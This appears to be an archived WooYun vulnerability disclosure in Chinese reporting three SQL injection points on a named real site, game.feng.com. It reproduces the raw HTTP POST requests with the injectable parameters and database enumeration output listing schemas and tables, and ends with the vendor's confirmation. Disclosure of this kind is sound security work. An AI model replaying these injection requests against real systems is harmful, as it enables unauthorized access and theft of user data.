乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-04: 细节已通知厂商并且等待厂商处理中 2015-02-04: 厂商已经确认,细节仅向厂商公开 2015-02-14: 细节向核心白帽子及相关领域专家公开 2015-02-24: 细节向普通白帽子公开 2015-03-06: 细节向实习白帽子公开 2015-03-21: 细节向公众公开
威锋网某站多处注入(root权限,可脱全网库)能给20么?
第一处:
POST /game/read/getDownloadButton.shtml HTTP/1.1Host: game.feng.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: CNZZDATA30093478=cnzz_eid%3D560578924-1423008837-http%253A%252F%252Fwww.wooyun.org%252F%26ntime%3D1423014237; PHPSESSID=auelk29lhhgjdosu4ren2o3iq5; NSC_hbnf.gfoh.dpn=ffffffffc3a0d33a45525d5f4f58455e445a4a423660X-Forwarded-For: 8.8.8.8Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 4id=1
参数:id第二处:
POST /game/read/getAppCommentList.shtml HTTP/1.1Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 NetsparkerAccept: application/json, text/javascript, */*; q=0.01Origin: http://game.feng.comReferer: http://game.feng.com/game/read/index-id-1438770.shtmlX-Requested-With: XMLHttpRequestAccept-Language: en-us,en;q=0.5X-Scanner: NetsparkerHost: game.feng.comCookie: PHPSESSID=j2mh6gqd74v4jpvmtkn2rg8ho6; NSC_hbnf.gfoh.dpn=ffffffffc3a0d33a45525d5f4f58455e445a4a423660Accept-Encoding: gzip, deflateContent-Length: 28Content-Type: application/x-www-form-urlencoded; charset=UTF-8page=%2527&entity_id=1438770
参数:page=第三处:
POST /game/read/manageComment.shtml HTTP/1.1Cache-Control: no-cacheConnection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 NetsparkerAccept: application/json, text/javascript, */*; q=0.01Origin: http://game.feng.comReferer: http://game.feng.com/game/read/index-id-1445798.shtmlX-Requested-With: XMLHttpRequestAccept-Language: en-us,en;q=0.5X-Scanner: NetsparkerHost: game.feng.comCookie: PHPSESSID=j2mh6gqd74v4jpvmtkn2rg8ho6; NSC_hbnf.gfoh.dpn=ffffffffc3a0d33a45525d5f4f58455e445a4a423660Accept-Encoding: gzip, deflateContent-Length: 40Content-Type: application/x-www-form-urlencoded; charset=UTF-8id=%2527&motion=oppose&entity_id=1445798
参数:id=上几张图:
available databases [6]:[*] information_schema[*] mysql[*] performance_schema[*] test[*] we+[*] weapodspaceDatabase: weapodspace[11 tables]+-------------------------+| system_cache || system_cache_group || system_function || system_module || system_right || system_right_url || system_role || system_role_right || system_user_role || weiphone_app_*_info || weiphone_app_*_info_1 |+-------------------------+Database: we+[271 tables]+----------------------------------------+| we_user_expert(delete) || account_record || admin_log || admin_message || admin_user || android_market_file_info || app_advertisement || app_and_article_relations || app_android_entity || app_android_entity_datetime || app_android_entity_decimal || app_android_entity_int || app_android_entity_text || app_android_entity_varchar || app_android_flat || app_android_flat_exten || app_article
应该是过滤了某些关键字,需要深入么?
危害等级:高
漏洞Rank:20
确认时间:2015-02-04 16:01
多谢你的提醒,我们尽快修复,给你20分
暂无